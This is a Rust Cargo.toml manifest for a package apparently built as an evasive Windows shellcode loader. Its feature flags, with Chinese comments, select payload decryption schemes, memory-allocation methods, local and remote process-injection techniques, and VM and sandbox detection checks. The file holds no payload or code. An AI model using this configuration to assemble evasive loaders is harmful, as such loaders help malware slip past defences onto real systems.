cargo-features = ["trim-paths", "panic-immediate-abort"]

[package]
name = "rsl"
version = "1.1.1"
edition = "2021"

[dependencies]
tempfile = "3.10.1"
base64 = "0.21.5"
windows-sys = { version = "0.42.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_LibraryLoader"] }
winreg = "0.52.0"
uuid = { version = "1.0", features = ["v4"] }
memmap2 = "0.6.1"
dirs = "4.0"
sha2 = "0.10"
rustcrypt-ct-macros = "0.1"
aes = "0.8"
chacha20 = "0.8"
generic-array = "0.14"
serde = { version = "1.0", features = ["derive"] }
wmi = "0.9"
aes-gcm = "0.10"
rc4 = "0.1"
ascon-aead = "0.4.2"
sm4 = "0.5"
ctr = "0.9"
chacha20poly1305 = "0.10"

[build-dependencies]
embed-resource = "1.8.0"

[features]
default = ["decrypt_ipv4", "alloc_mem_va", "run_create_thread"]

# 解密算法特性开关
base64_decode = []
decrypt_shikata_ga_nai = ["base64_decode"]     # 启用Shikata Ga Nai多态解密
decrypt_chacha20_aes = ["base64_decode"]       # 启用ChaCha20-AES双重解密
decrypt_aes_gcm = ["base64_decode"]            # 启用AES-GCM解密
decrypt_ascon = ["base64_decode"]              # 启用Ascon-128解密
decrypt_sm4_ctr = ["base64_decode"]            # 启用SM4-CTR解密
decrypt_xchacha20 = ["base64_decode"]          # 启用XChaCha20-Poly1305解密
decrypt_rc4 = ["base64_decode"]                # 启用RC4解密
decrypt_ipv4 = ["base64_decode"]               # 启用IPv4解密
decrypt_ipv6 = ["base64_decode"]               # 启用IPv6解密
decrypt_mac = ["base64_decode"]                # 启用MAC解密
decrypt_uuid = ["base64_decode"]               # 启用UUID解密

# 内存分配方式
alloc_mem_va = []
alloc_mem_mapview = []
alloc_mem_heap = []
alloc_mem_nt_allocate = []
alloc_mem_global = []
alloc_mem_numa = []
alloc_mem_com = []
alloc_mem_local = []
alloc_mem_crypt = []
alloc_mem_rtl = []
alloc_mem_ole = []
alloc_mem_section = []
alloc_mem_va_from_app = []
alloc_mem_sh_alloc = []
alloc_mem_net_api_buffer = []
alloc_mem_snmp_util = []

# 注入/执行方式
pattern1 = []
pattern2 = []
pattern3 = []
run_enum_ui = ["pattern1"]                # UI线程枚举注入
run_create_thread = ["pattern1"]          # CreateThread注入
run_apc = ["pattern1"]                    # APC注入
run_gdi_families = ["pattern1"]           # GDI家族注入
run_threadpool_callback = ["pattern1"]    # 线程池回调注入
run_enum_system_locales = ["pattern1"]    # EnumSystemLocalesA 回调注入
run_timer_queue = ["pattern1"]            # CreateTimerQueueTimer 注入
run_fls_alloc = ["pattern1"]              # FlsAlloc 注入
run_linedda = ["pattern1"]                # LineDDA 回调注入
run_enum_date_formats = ["pattern1"]      # EnumDateFormatsA 回调注入
run_call_window_proc = ["pattern1"]       # CallWindowProcA 直接调用
run_enum_props = ["pattern1"]             # EnumPropsA 回调注入
run_enum_resource_types = ["pattern1"]    # EnumResourceTypesA 回调注入
run_enum_objects = ["pattern1"]           # EnumObjects 回调注入
run_cert_enum_system_store = ["pattern1"] # CertEnumSystemStore 回调注入
run_imm_enum_input_context = ["pattern1"] # ImmEnumInputContext 回调注入
run_fiber = ["pattern1"]                  # CreateFiber/SwitchToFiber 注入
run_nt_queue_apc_thread_ex = ["pattern1"] # NtQueueApcThreadEx (Local) 注入
run_etwp_create_etw_thread = ["pattern1"] # EtwpCreateEtwThread 注入

run_early_bird_apc = ["pattern2"]         # Early Bird APC 注入

run_create_remote_thread = ["pattern3"]    # CreateRemoteThread 远程注入
run_nt_create_thread_ex = ["pattern3"]     # NtCreateThreadEx 远程注入
run_rtl_create_user_thread = ["pattern3"]  # RtlCreateUserThread 远程注入

with_forgery = []               # 启用伪造特性

# 虚拟机/沙箱检测特性
sandbox = []
vm_check_c_drive = ["sandbox"]
vm_check_desktop_files = ["sandbox"]
vm_check_tick = ["sandbox"]
vm_check_memory = ["sandbox"]
vm_check_api_flood = ["sandbox"]
vm_check_mouse = ["sandbox"]
vm_check_common_software = ["sandbox"]
vm_check_uptime = ["sandbox"]
vm_check_system_noise = ["sandbox"]
vm_check_timer_resolution = ["sandbox"]
vm_check_l3_cache = ["sandbox"]

vm_check_cpu_freq = ["sandbox"]

win7 = []

[profile.release]
opt-level = 3
lto = true
codegen-units = 1
strip = true
debug = false
split-debuginfo = "off"
panic = "immediate-abort"
trim-paths = "all"